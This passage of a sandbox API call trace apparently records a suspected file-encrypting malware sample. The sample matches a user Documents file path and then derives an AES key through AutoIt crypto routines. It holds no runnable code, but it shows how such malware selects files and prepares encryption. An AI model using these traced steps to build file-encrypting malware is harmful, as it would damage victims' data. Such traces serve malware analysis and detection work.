cchCount2=10) returned 3 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hSA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SA9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uDUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bxf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2lgxu.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.696] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.696] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0177.696] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0177.696] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0177.696] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.696] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.696] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.696] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.696] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.696] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd471860, ftCreationTime.dwHighDateTime=0x1d5e4c0, ftLastAccessTime.dwLowDateTime=0xe53b1530, ftLastAccessTime.dwHighDateTime=0x1d5e177, ftLastWriteTime.dwLowDateTime=0xe53b1530, ftLastWriteTime.dwHighDateTime=0x1d5e177, nFileSizeHigh=0x0, nFileSizeLow=0x15e3b, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="f2lgxu.rtf", cAlternateFileName="")) returned 0x90af58 [0177.696] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0177.697] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.697] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0177.697] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.697] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.697] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0177.697] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.697] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0177.697] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.697] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.697] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0177.697] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.697] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.697] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.697] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.697] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.697] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0177.697] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.697] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0177.698] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.698] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.698] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0177.698] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.699] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.699] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.699] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.699] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.699] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0177.699] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.699] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.699] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.699] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.699] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.699] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.699] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0177.699] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.699] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.699] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0177.699] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.699] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.699] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0177.699] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.699] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.699] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0177.699] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.699] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.699] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.700] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.700] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.700] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.700] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.700] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0177.700] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.700] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.700] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0177.700] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.700] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.700] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.700] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.700] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0177.700] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.700] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.700] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.700] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.700] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.700] CryptHashData (hHash=0x90ae18, pbData=0x8df1e0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0177.700] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.700] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.700] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.700] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.700] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.701] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0177.701] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.701] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.701] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0177.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0177.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0177.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0177.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0177.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0177.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0177.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0177.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0177.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0177.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0177.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0177.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0177.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0177.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0177.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0177.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0177.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0177.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0177.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0177.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0177.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0177.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0177.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0177.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0177.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0177.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0177.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0177.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0177.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 